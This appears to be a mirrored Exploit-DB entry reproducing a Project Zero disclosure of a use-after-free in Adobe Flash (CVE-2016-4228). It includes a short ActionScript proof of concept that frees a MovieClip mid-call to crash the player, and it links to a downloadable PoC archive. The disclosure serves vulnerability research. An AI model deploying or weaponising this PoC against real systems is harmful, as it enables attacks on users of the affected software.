- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 40309
- Проверка EDB
-
- Пройдено
- Автор
- GOOGLE SECURITY RESEARCH
- Тип уязвимости
- DOS
- Платформа
- MULTIPLE
- CVE
- cve-2016-4228
- Дата публикации
- 2016-08-29
Adobe Flash - Use-After-Free When Returning Rectangle
Код:
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=842
Several methods in flash return instances of the Rectangle class. There is a use-after-free in creating these objects for return. If the this object of the call is a MovieClip, the Rectangle instantiation will run on its thread. If a getter is added to this class's package, it will be invoked when fetching the rectangle constructor, which can free the method's thread, which will cause the Rectangle constructor to run on a thread which has been freed. A minimal PoC is at follows:
var mc = this.createEmptyMovieClip( "mc", 1);
mc.scrollRect = {x : 0, y : 0, height : 10, width : 10}
var r = flash.geom.Rectangle;
var g = flash.geom;
g.addProperty("Rectangle", func, func);
var f = ASnative(900, 405); //scrollRect
mc.f = f;
mc.f();
function func(){
mc.removeMovieClip();
// fix heap
return r;
}
A PoC and swf are attached. The PoC crashes in Chrome on 64-bit Windows.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40309.zip- Источник
- www.exploit-db.com
